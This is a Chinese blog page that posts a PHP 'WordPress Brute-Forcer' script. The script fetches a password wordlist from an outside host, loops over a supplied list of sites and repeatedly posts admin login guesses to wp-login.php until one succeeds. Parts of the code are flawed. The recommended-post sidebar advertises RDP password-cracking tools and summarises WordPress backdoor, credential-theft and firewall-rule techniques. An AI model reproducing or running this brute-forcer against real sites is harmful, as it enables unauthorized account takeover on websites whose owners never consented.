WordPress brute forcing

最新推荐文章于 2025-12-08 11:06:51 发布
最新推荐文章于 2025-12-08 11:06:51 发布 · 138 阅读 · 0
文章标签:

#php 

<?php

/*
*	MegaTurks Wordpress Brute-Forcer
*	Coded By Burtay
*	admin@burtay.org (only mail)
*	Burtay.org	-	Megaturks.net
*	Speacial Thanks RMx
*/

class wp
{

		public $site;
		public $password;
		public $wordlist;
		public $siteler;
		public $regex		=	'general.php';
		
		public function wordlist()
		{
			$liste			=	file_get_contents("http://afrikanhosting.com/images/wp.txt");
			$this->wordlist	=	explode("/n",$liste);
			return $this->wordlist;
		}
		
		public function curl($site,$password)
		{
			$curl			=	curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
			curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php");
			curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat");
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
			curl_setopt($curl,CURLOPT_POST,1);
			curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1");
			$calis			=	curl_exec($curl);
			return $calis;
		}
		
		public function siteler($liste)
		{
			$site  			=	file_get_contents($liste);
			$this->siteler	=	explode("/n",$site);
			return $this->siteler;
		}
		
		public function burtay($liste)
		{
			$this->siteler($liste);
			foreach($this->siteler as $sites)
			{
				$site	=	trim($sites);
				echo "Denenen Site : " . $site . "/n";
				  
				  foreach($this->wordlist() as $sifre)
					{
						$password	=	trim($sifre);
						echo "Denenen Sifre " . $password . "/n";
							if ( eregi ($this->regex,$this->curl($site,$password)) )
							{
								echo "-------------------------------------/n";
								echo $site . " icin sifre kirildi sifre : " . $password . "/n" ;
								echo "Coded By Burtay/n";
								echo "Special Thanks RMx/n";
								echo "-------------------------------------/n";
								break;
							}
					}
			}
		}
}
echo "
------------------
MegaTurks.Net   ||
Coded By Burtay	||
------------------			
/n/n
";
$class =	new wp();
$class->burtay($argv[1]);
?>
iteye_11341
关注
CTF之暴力*解(wordpress
afei001
03-29 1319
暴力*解漏洞介绍 暴力*解最常用的方法:穷举法     穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。 Web安全中的暴力*解也是利用尝试所有的可能性最终获取正确的结果。 练习环境 攻击机:kali ...
NLBrute爆破.zip
11-16
无毒无后门,不信可请自行检查,个人使用 DUBrute是一款强大的远程桌面(3389)密码破解软件,你可以用本附件的扫描功能来自动扫描活跃IP地址,扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了。只要你密码设置的好相信会有很大的收获哦。
ae教程 (七)动效插件 (二)定向爆破
ltd0924的博客
08-25 1367
示例2:定向爆破 定向爆破就是只破坏楼群中指定的高楼,而不会伤及其他,本示例主要学习的是碎片 效果 新建合成,新建白色纯色层,添加梯度渐变 选择 径向渐变  预合成 移动全部属性至新合成 导入一张楼群照片,变换至适合复合  预合成 移动全部属性至新合成 选中楼群合成,添加 碎片 效果 展开 作用力1选项组,具体参数如下 打开楼群的预合成,选中图片图层,选择 钢笔工具,延其中一栋...
勒索软件_横向工具传输
kitsch0x97的博客
09-11 2815
对手可能会在受感染的环境中在系统之间传输工具或其他文件。一旦工具或文件进入受害者环境(即工具传入),对手可能会在不同系统之间复制这些文件,以在操作过程中布置对手的工具或其他文件。其中,文件共享协议和RDP依赖于内网的文件共享和远程桌面服务,主要用于Windows系统;而原生工具如FTP、SFTP、scp、rsync等适用于跨平台环境(如Linux、macOS),并且可以通过云存储服务(如Dropbox、OneDrive)进行传输,突破内网限制。
nl
gRpc的博客
10-23 754
nl (Number of Lines) 将指定的文件添加行号标注后写到标准输出。如果不指定文件或指定文件为"-" ,程序将从标准输入读取数据
DUBrute V4.2 RC
02-11
DUBrute V4.2 RC
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1391
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
网络渗透--1(认识wpscan和wordpress
m0_50599085的博客
09-30 936
wordpress是一款常见的内容管理服务器,它具有高度自由的自定义属性,管理员可以通过后台图形化界面方便地修改网站上所显示的内容,这个特点吸引了全球数百万用户。为了更好地发现系统的漏洞,进一步维护用户的权益,wpscan team开发了专门针对wordpress的安全工具wpscan,截至目前,最新的wpscan数据库中包括了超过40000+漏洞,通过此工具可以对wordpress网站进行全面的扫描,包括系统本身的漏洞,各种插件和主题的漏洞。后续在获取到漏洞数据后,可以针对这些漏洞进行特定的检测规划。
23、WordPress攻击与持久化及凭证窃取技术详解
最新发布
xray4的博客
12-08 25
本文详细解析了针对WordPress网站的攻击技术,涵盖用户枚举、密码暴力破解、反向shell生成与持久化访问实现,并深入探讨了通过修改主题文件注入后门、绕过数据库限制、提取密码哈希及捕获明文登录凭证的方法。结合Metasploit与ProxyChains等工具,展示了完整的渗透测试流程,强调隐蔽性与合法性,适用于安全研究人员进行合规的安全评估与漏洞分析。
【vulnhub】【DC系列】DC2 - WordPress 靶机
Nicky_Zheng的博客
01-26 968
1、信息收集 1.1、端口扫描 netdiscover发现靶机ip : 192.168.57.148 nmap -sSV -A -Pn -n -p 1-65535 --version-intensity 9 192.168.57.148 Nmap scan report for 192.168.57.148 Host is up (0.00100s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp
Web表单破解工具 – Brute Forcer v1.1
06-26
Web表单破解工具 – Brute Forcer v1.1 俄罗斯棒子编写的程序
算术软件1.2
04-15
训练小学生四则运算速算能力的小软件。
DUBrute多密码爆破
03-11
DUBrute多密码爆破,维护网络安全,请用于学习测试。谢谢
软件爆破入门教程(适用新手)
05-22
软件爆破入门,用通俗的语言讲解软件爆破理论和例子
NL系列2014.pdf
06-08
程控电话交换机说明书NL系列2014.pdf
50个端口渗透高阶技巧,(非常详细)从零基础到精通,收藏这篇就够了!
Libra1313的博客
06-13 710
在老鸟眼里,这玩意儿简直就是网络攻防的微观战场,每个端口都藏着无数的坑和机会。别再抱着Nmap啃了,今天我就把压箱底的50条端口渗透技巧抖搂出来,全是血与泪的教训,红队兄弟们赶紧码住!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。记住,技术是死的,人是活的。安全工程师要不断学习新的漏洞,培养攻击者思维,才能构建真正的主动防御体系。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。3.SRC&黑客文籍。
威胁预警|首现新型RDPMiner挖矿蠕虫 受害主机易被添加恶意账户 ...
weixin_34179968的博客
01-09 389
近日,阿里云安全发现一种新型挖矿蠕虫RDPMiner,通过爆破Windows Server 3389端口RDP服务的方式进行挖矿木马传播,致使用户CPU占用率暴涨,机器卡顿,更被创建名为DefaultAccount的账号。攻击者可畅通无阻远程登录机器威胁用户业务和数据安全。 据该蠕虫连接的某矿池公布的HashRate,预估仅该矿池即有2000+机器连接进...
WEB渗透Win提权篇-RDP&Firewall
qq_59468567的博客
08-24 699
放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注: 修改连接端口重启后生效。
每天一个linux命令(11):nl命令
weixin_34409741的博客
11-01 474
nl命令在linux系统中用来计算文件中行号。nl 可以将输出的文件内容自动的加上行号!其默认的结果与 cat -n 有点不太一样, nl 可以将行号做比较多的显示设计,包括位数与是否自动补齐 0 等等的功能。  1.命令格式:nl [选项]... [文件]...2.命令参数:-b  :指定行号指定的方式,主要有两种:-b a :表示不论是否为空行,也同样列出行号(类似 cat -n);-b t ...
[+] victor | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)
06-27
### 检测和确认 Victor 主题或用户信息的方法 在检测和确认特定主题(如 Victor)或用户相关信息时,通常采用主动与被动两种方法。这些方法广泛应用于数据挖掘、用户行为分析以及信息检索领域。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值